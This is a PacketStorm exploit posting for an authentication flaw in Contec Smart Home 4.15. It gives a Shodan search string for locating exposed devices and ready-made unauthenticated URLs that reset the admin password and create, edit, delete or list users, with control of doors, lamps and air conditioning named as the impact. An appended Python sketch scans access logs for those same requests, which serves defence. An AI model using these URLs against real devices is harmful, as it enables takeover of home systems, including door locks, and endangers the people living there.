Contec Smart Home 4.15 Insecure Direct Object Reference

2018-03-16T00:00:00
ID PACKETSTORM:146824
Type packetstorm
Reporter Z3ro0ne
Modified 2018-03-16T00:00:00

Description

`# Title : Contec smart home 4.15 Unauthorized Password Reset  
# Shodan Dork : "content/smarthome.php"  
# Vendor Homepage : http://contec.co.il  
# Tested on : Google Chrome  
# Tested version : 4.15  
# Date : 2018-03-14  
# Author : Z3ro0ne  
# Contact : saadousfar59@gmail.com  
# Facebook Page : https://www.facebook.com/Z3ro0ne  
  
# Vulnerability description :  
The vulnerability allows an unauthenticated attacker to remotely bypass authentication, change the admin password without knowing the old password, and control connected devices (lamps, doors, air conditioner...).  
  
  
# Exploit   
  
To reset the admin password  
http://Ipaddress:port/content/new_user.php?user_name=ADMIN&password=NEWPASSWORD&group_id=1  
  
To create a new user  
http://Ipaddress:port/content/new_user.php?user_name=NEWUSER&password=NEWPASSWORD&group_id=1  
  
To edit a user  
http://Ipaddress:port/content/edit_user.php?user_name=USER&password=NEWPASSWORD&group_id=1  
  
To delete a user  
http://Ipaddress:port/content/delete_user.php?user_name=USER  
  
User list  
http://Ipaddress:port/content/user.php  
  
`
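
On the detection side, the sketch below scans web access logs for requests to the four user-management URLs listed above and reports who made them and what they changed. It is an added example, not part of the original advisory; the combined log format, the `scan` function, the `trusted` allowlist of management hosts and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints named in the advisory, mapped to the action each performs.
ENDPOINTS = {
    "/content/new_user.php": "create_or_reset",
    "/content/edit_user.php": "edit",
    "/content/delete_user.php": "delete",
    "/content/user.php": "list_users",
}

# Assumption: combined-log-format lines; adapt the regex to the device's real log.
LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def scan(lines, trusted=frozenset()):
    """Return one finding per user-management request from an untrusted source."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["src"] in trusted:
            continue
        url = urlsplit(m["target"])
        action = ENDPOINTS.get(url.path)
        if action is None:
            continue
        q = parse_qs(url.query)
        findings.append({
            "src": m["src"], "time": m["ts"], "action": action,
            "user": q.get("user_name", [""])[0],
            "status": int(m["status"]),
            # A password in the query string also leaks the credential into logs.
            "password_in_url": "password" in q,
            "admin_group": q.get("group_id", [""])[0] == "1",
        })
    return findings

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE = [
    '203.0.113.7 - - [14/Mar/2018:10:01:02 +0000] "GET /content/user.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [14/Mar/2018:10:01:09 +0000] "GET /content/new_user.php?user_name=ADMIN&password=x&group_id=1 HTTP/1.1" 200 20',
    '192.0.2.10 - - [14/Mar/2018:10:02:00 +0000] "GET /content/smarthome.php HTTP/1.1" 200 4096',
    '192.0.2.10 - - [14/Mar/2018:10:03:00 +0000] "GET /content/delete_user.php?user_name=guest HTTP/1.1" 200 20',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE, trusted={"192.0.2.10"}):
        print(finding)
```

Because the advisory states these endpoints respond without authentication, a 200 status on any finding from a host outside the allowlist warrants checking the device's user list and resetting credentials.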